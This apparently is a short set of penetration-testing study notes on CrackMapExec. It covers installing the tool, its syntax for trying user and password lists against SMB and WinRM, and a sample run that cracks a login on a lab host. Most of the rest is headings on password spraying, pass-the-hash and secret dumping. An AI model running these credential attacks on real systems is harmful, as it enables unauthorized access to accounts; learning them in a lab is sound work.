About me
Edit

CrackMapExec

install

sudo apt install snapd
sudo snap install crackmapexec

CrackMapExec Protocol-Specific Help

crackmapexec smb -h

CrackMapExec Usage

crackmapexec <proto> <target-IP> -u <user or userlist> -p <password or passwordlist>
crackmapexec winrm 10.129.42.197 -u user.list -p password.list
WINRM       10.129.42.197   5985   NONE             [*] None (name:10.129.42.197) (domain:None)
WINRM       10.129.42.197   5985   NONE             [*] http://10.129.42.197:5985/wsman
WINRM       10.129.42.197   5985   NONE             [+] None\user:password (Pwn3d!)

Support Protocols

SMB

Null Authentication

Anonymous Authentication

  • put any value in the user field

Login with username and password

Remote Dumping & LSA Secrets Considerations

Pass the Hash with CrackMapExec

CrackMapExec - Command Execution

winrm

Others

Enumerating the Password Policy - from Linux - Credentialed

SMB NULL Session to Pull User List

Password Spraying Active Directory

Local Admin Spraying with CrackMapExec

  • The --local-auth flag will tell the tool only to attempt to log in one time on each machine which removes any risk of account lockout.

    • Make sure this flag is set so we don't potentially lock out the built-in administrator for the domain

PreviousAttacking SAMNextAttacking LSASS

Last updated